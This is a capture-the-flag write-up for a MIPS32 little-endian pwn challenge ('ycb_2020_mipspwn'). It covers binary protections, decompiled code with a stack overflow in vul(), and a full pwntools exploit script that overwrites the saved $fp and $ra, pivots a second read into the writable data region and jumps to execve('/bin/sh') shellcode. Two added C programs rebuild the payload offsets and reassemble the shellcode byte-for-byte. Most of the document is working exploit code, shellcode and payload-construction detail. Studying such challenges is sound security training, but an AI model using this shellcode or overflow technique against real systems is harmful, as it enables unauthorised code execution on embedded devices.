Knowledge points involved:
Leak or modify memory data:
- Heap address:
- Stack address:
- libc address:
- BSS address: fixed, because the binary is not PIE (the second stage of the exploit is written to a fixed writable address in the data region)
Hijack control flow: stack overflow in vul() overwrites the saved $fp and $ra
Get a shell or the flag: MIPS shellcode
Challenge type:
MIPS_Pwn
Related knowledge points:
Information-gathering summary
Challenge information:
┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ file ./pwn2
./pwn2: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ checksec --file=pwn2
RELRO          No RELRO
STACK CANARY   No canary found
NX             NX disabled
PIE            No PIE
RPATH          No RPATH
RUNPATH        No RUNPATH
Symbols        97 Symbols
FORTIFY        No
Fortified      0
Fortifiable    3
FILE           pwn2
libc version: uClibc (the interpreter is /lib/ld-uClibc.so.0, see the file output above)
Writeup reference: 异构框架之mips框架的pwn学习笔记 (MIPS-architecture pwn study notes) | CN-SEC 中文网
https://www.cnblogs.com/trunk/p/17409345.html
MIPS runtime libraries (for qemu-mipsel -L): MonkeyJacky/mipsel-linux-uclibc: uclibc chain tools. (github.com)
Program run output:
┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ qemu-mipsel -L ./ ./pwn2
Warrior,leave your name here:
1
hello,1
***********************
Welcome to the magic block world!
***********************
1.create a block
2.throw a block
3.write something on the block
4.exit the world
Your choice: 1
Give me a block ID: 1
how big: 1
Done!
***********************
Welcome to the magic block world!
***********************
1.create a block
2.throw a block
3.write something on the block
4.exit the world
Your choice:
Core pseudocode analysis:
Exploitable code:
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int choice; // [sp+18h] [+18h] BYREF

  init();
  puts("Warrior,leave your name here:");
  read(0, name, 8u);              // name is a global buffer at a fixed address (no PIE)
  printf("hello,%s", name);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      scanf("%d", &choice);
      if ( choice != 1 )
        break;
      add();
    }
    if ( choice == 2 )
    {
      delete();
    }
    else if ( choice == 3 )
    {
      edit();
    }
    else if ( choice == 7 )       // not listed in the menu; the script reaches the overflow through it
    {
      description();
    }
    else
    {
      if ( choice == 4 )
      {
        puts("See you tomorrow~");
        exit(0);
      }
      puts("Invalid choice!");
    }
  }
}

ssize_t vul()
{
  char buf[56]; // [sp+18h] [+18h] BYREF

  return read(0, buf, 0xB0u);    // 0xB0 = 176 bytes into a 56-byte buffer: the saved $fp and $ra above buf are overwritten
}
vul() reads up to 0xB0 (176) bytes into buf[56]: a plain stack overflow, with no canary, NX disabled and no PIE.
Attack approach summary
Because the binary is not PIE and NX is disabled, shellcode can be written to a fixed writable address and executed there. The exploit (the script below) reaches vul() through the hidden menu option 7 and works in two stages:
1. First overflow: 56 filler bytes fill buf, the next 4 bytes overwrite the saved $fp with an address in the writable data region (0x41164C + 0x50, used as a fake frame), and the next 4 bytes overwrite the saved $ra with 0x400F50. Judging from the second-stage offsets, this re-runs the read in vul() with the fake $fp, so the read now lands in the data region instead of the stack.
2. Second read: 0x3c bytes of padding reach the $ra slot of the fake frame; it is set to the address immediately after the slot (0x41164C + 0x50 + 0x58) and the MIPS execve("/bin/sh") shellcode follows, so when the function returns again it jumps straight into the shellcode.
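To make the two-stage payload concrete, here is an added C model of vul()'s stack frame and of the fake frame the exploit pivots to. It is example code written for this page, not the writeup author's script or code from the binary. The frame layout (buf at $fp+0x18, saved $fp at +0x50, saved $ra at +0x54, frame size 0x58) and the reading of 0x400F50 as the body of vul() after its prologue are assumptions inferred from the payload offsets in the script; check them against the disassembly before relying on them.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame of vul() as the decompiler shows it (buf at sp+0x18) plus the two
 * slots an o32 prologue stores above the locals. The $fp/$ra positions are
 * an ASSUMPTION read off the script's payload offsets (56 bytes to $fp,
 * 60 bytes to $ra); verify them against the real prologue before reuse. */
struct vul_frame {
    uint8_t  args[0x18];   /* outgoing-argument area and padding */
    char     buf[56];      /* read(0, buf, 0xB0) starts writing here */
    uint32_t saved_fp;     /* $fp ($s8), reloaded by the epilogue */
    uint32_t saved_ra;     /* return address, reloaded by the epilogue */
};                         /* sizeof == 0x58 */

/* Constants taken from the script; what they denote is inferred, not verified here. */
#define NAME_ADDR 0x41164Cu              /* fixed writable address (binary is not PIE) */
#define FAKE_FP   (NAME_ADDR + 0x50u)    /* where the fake frame is placed */
#define RET_ADDR  0x400F50u              /* assumed: vul() body, after its prologue */
#define READ_LEN  0xB0u                  /* size argument of the vulnerable read() */

static void put32(uint8_t *p, uint32_t v) {   /* little-endian, target is mipsel */
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Stage 1: overflow the real frame: 56 filler bytes, then $fp, then $ra. */
size_t build_stage1(uint8_t *out, size_t cap) {
    size_t len = offsetof(struct vul_frame, saved_ra) + 4 - offsetof(struct vul_frame, buf);
    if (cap < len) return 0;
    memset(out, 'a', 56);
    put32(out + 56, FAKE_FP);
    put32(out + 60, RET_ADDR);
    return len;            /* 64 */
}

/* Once $fp == fake_fp, the code addresses buf as $fp+0x18 ... */
uint32_t pivoted_buf(uint32_t fake_fp) { return fake_fp + offsetof(struct vul_frame, buf); }
/* ... and the epilogue (move $sp,$fp; lw $ra,0x54($sp)) reloads $ra from here. */
uint32_t pivoted_ra_slot(uint32_t fake_fp) { return fake_fp + offsetof(struct vul_frame, saved_ra); }

/* Stage 2: pad from the pivoted buf up to its $ra slot, write the address of
 * the bytes right after that slot, then put the shellcode there. */
size_t build_stage2(uint8_t *out, size_t cap, uint32_t fake_fp,
                    const uint8_t *sc, size_t sc_len) {
    size_t pad = pivoted_ra_slot(fake_fp) - pivoted_buf(fake_fp);   /* 0x3c */
    size_t len = pad + 4 + sc_len;
    if (len > cap || len > READ_LEN) return 0;   /* must fit in one read(0, buf, 0xB0) */
    memset(out, 'a', pad);
    put32(out + pad, pivoted_ra_slot(fake_fp) + 4);
    memcpy(out + pad + 4, sc, sc_len);
    return len;
}

int main(void) {
    uint8_t sc[39] = {0};   /* stand-in for the 39-byte execve shellcode from the script */
    uint8_t s1[64], s2[READ_LEN];
    size_t n1 = build_stage1(s1, sizeof s1);
    size_t n2 = build_stage2(s2, sizeof s2, FAKE_FP, sc, sizeof sc);
    printf("stage1 %zu bytes, $fp <- 0x%08x, $ra <- 0x%08x\n", n1, get32(s1 + 56), get32(s1 + 60));
    printf("stage2 %zu bytes, fake $ra slot 0x%08x -> shellcode at 0x%08x\n",
           n2, pivoted_ra_slot(FAKE_FP), get32(s2 + 0x3c));
    return 0;
}
```

The model reproduces the script's numbers: 56 + 4 + 4 bytes for stage 1, 0x3c bytes of padding for stage 2, and a return address of 0x41164C + 0x50 + 0x58, which is the first byte after the fake frame's $ra slot. The size check in build_stage2 is the caveat a practitioner wants: everything written through the pivoted read, padding included, has to fit in the 0xB0 bytes that read() accepts.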
Script:
from pwn import *

context(arch='mips', os='linux', log_level='debug')
file_name = './pwn2'
li = lambda x: print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux', 'splitw', '-h']

use_remote = 1          # 1: attack the BUU instance, 0: run locally under qemu-mipsel
if use_remote:
    r = remote('node5.buuoj.cn', 29472)
else:
    # -L . makes qemu pick up the uClibc loader and libraries placed next to the binary
    r = process(['qemu-mipsel', '-L', '.', file_name])
elf = ELF(file_name)

def dbg():          # debugging helper, not used below; expects qemu started with -g 1234
    gdb.attach(r, "target remote localhost:1234")

def dbgg():         # pause so a debugger can be attached by hand
    input()

menu = b'Your choice: '
#dbgg()
r.sendlineafter(b'Warrior,leave your name here:\n', b'z1r0')
r.sendlineafter(menu, b'7')          # hidden option 7 leads to description() and the overflow in vul()

# stage 1: 56 bytes fill buf, then the saved $fp becomes a fake frame in the
# writable data region and the saved $ra becomes 0x400F50 (vul() runs its read again)
p1 = b'a' * (60 - 4) + p32(0x41164C + 0x50) + p32(0x400F50)
r.sendlineafter(b'Write down your feeling:\n', p1)

# MIPS32 little-endian execve("/bin/sh", 0, 0) shellcode; "/bin/sh" relies on the
# zero-filled memory after it for its terminator
shellcode = b'\x11\x01\x06\x24\xff\xff\xd0\x04\x00\x00\x06\x24\xe0\xff\xbd\x27\x14\x00\xe4\x27\x00\x00\x05\x24\xab\x0f\x02\x24\x0c\x00\x00\x00/bin/sh'
# stage 2: lands in the fake frame; 0x3c bytes of padding reach its $ra slot,
# which is pointed at the shellcode placed right after the slot
p2 = b'a' * 0x3c + p32(0x41164c + 0x50 + 0x58) + shellcode
r.send(p2)
r.interactive()
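The shellcode in the script is a raw byte string. The added C program below, written for this page and not taken from the writeup, assembles the same eight MIPS32 instructions from their fields, compares the result byte-for-byte with the page's bytes, and works out where the `bltzal` trick makes $a0 point. Register numbers, opcodes and the o32 execve syscall number 4011 are standard MIPS facts; the buffer and function names are the example's own.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { ZERO = 0, V0 = 2, A0 = 4, A1 = 5, A2 = 6, SP = 29, RA = 31 };   /* MIPS o32 register numbers */

/* MIPS32 I-type encodings used by the shellcode. */
static uint32_t addiu(unsigned rt, unsigned rs, int16_t imm) {        /* opcode 9 */
    return (9u << 26) | (rs << 21) | (rt << 16) | (uint16_t)imm;
}
static uint32_t bltzal(unsigned rs, int16_t off) {                     /* REGIMM (1), rt = 0x10 */
    return (1u << 26) | (rs << 21) | (0x10u << 16) | (uint16_t)off;
}
static const uint32_t SYSCALL = 0x0000000cu;
#define NR_EXECVE_O32 4011      /* MIPS o32: 4000 + 11 */
#define SHELLCODE_MAX 64

/* Emit one instruction word little-endian (the target is mipsel). */
static size_t emit(uint8_t *out, uint32_t w) {
    out[0] = (uint8_t)w;         out[1] = (uint8_t)(w >> 8);
    out[2] = (uint8_t)(w >> 16); out[3] = (uint8_t)(w >> 24);
    return 4;
}

/* execve("/bin/sh", 0, 0). The string sits right after the 8 instructions;
 * bltzal is a position-independent "get PC": it writes PC+8 into $ra whether
 * or not the branch is taken, and $a2 > 0 guarantees it is not taken. */
size_t assemble_shellcode(uint8_t *out) {
    size_t n = 0;
    n += emit(out + n, addiu(A2, ZERO, 0x111));   /* offset  0: $a2 positive -> no branch */
    n += emit(out + n, bltzal(A2, -1));           /* offset  4: $ra = PC + 8 = offset 12 */
    n += emit(out + n, addiu(A2, ZERO, 0));       /* offset  8: delay slot, envp = NULL */
    n += emit(out + n, addiu(SP, SP, -0x20));     /* offset 12: $ra points here */
    n += emit(out + n, addiu(A0, RA, 0x14));      /* offset 16: $a0 = $ra + 0x14 = offset 32 */
    n += emit(out + n, addiu(A1, ZERO, 0));       /* offset 20: argv = NULL */
    n += emit(out + n, addiu(V0, ZERO, NR_EXECVE_O32)); /* offset 24 */
    n += emit(out + n, SYSCALL);                  /* offset 28 */
    memcpy(out + n, "/bin/sh", 7);                /* offset 32: no NUL of its own */
    return n + 7;                                 /* 39 bytes */
}

/* The string offset exactly as the code computes it at run time. */
size_t path_offset_from_code(void) {
    size_t ra = 4 + 8;      /* bltzal at offset 4 links PC + 8 */
    return ra + 0x14;       /* addiu $a0, $ra, 0x14 */
}

/* The page's byte string, for comparison. */
static const uint8_t PAGE_SHELLCODE[] =
    "\x11\x01\x06\x24\xff\xff\xd0\x04\x00\x00\x06\x24\xe0\xff\xbd\x27"
    "\x14\x00\xe4\x27\x00\x00\x05\x24\xab\x0f\x02\x24\x0c\x00\x00\x00/bin/sh";

int matches_page_shellcode(void) {
    uint8_t buf[SHELLCODE_MAX];
    size_t n = assemble_shellcode(buf);
    return n == sizeof(PAGE_SHELLCODE) - 1 && memcmp(buf, PAGE_SHELLCODE, n) == 0;
}

/* Does the payload carry a NUL terminator for "/bin/sh"? It does not, so the
 * destination memory after the payload must already be zero (fresh .bss is). */
int path_is_self_terminated(void) {
    uint8_t buf[SHELLCODE_MAX];
    size_t n = assemble_shellcode(buf);
    size_t off = path_offset_from_code();
    return memchr(buf + off, 0, n - off) != NULL;
}

int main(void) {
    uint8_t buf[SHELLCODE_MAX];
    size_t n = assemble_shellcode(buf);
    for (size_t i = 0; i < n; i++) printf("%02x%s", buf[i], (i % 16 == 15) ? "\n" : " ");
    printf("\n%zu bytes, \"/bin/sh\" at offset %zu, matches page: %d, self-terminated: %d\n",
           n, path_offset_from_code(), matches_page_shellcode(), path_is_self_terminated());
    return 0;
}
```

Two details matter when reusing this shellcode elsewhere: the string pointer is derived from $ra, so the code runs unchanged at any address (which is why the exploit can drop it into the data region), and "/bin/sh" is not NUL-terminated in the payload, so it only works where the bytes after it are already zero, as they are when read() writes into untouched .bss.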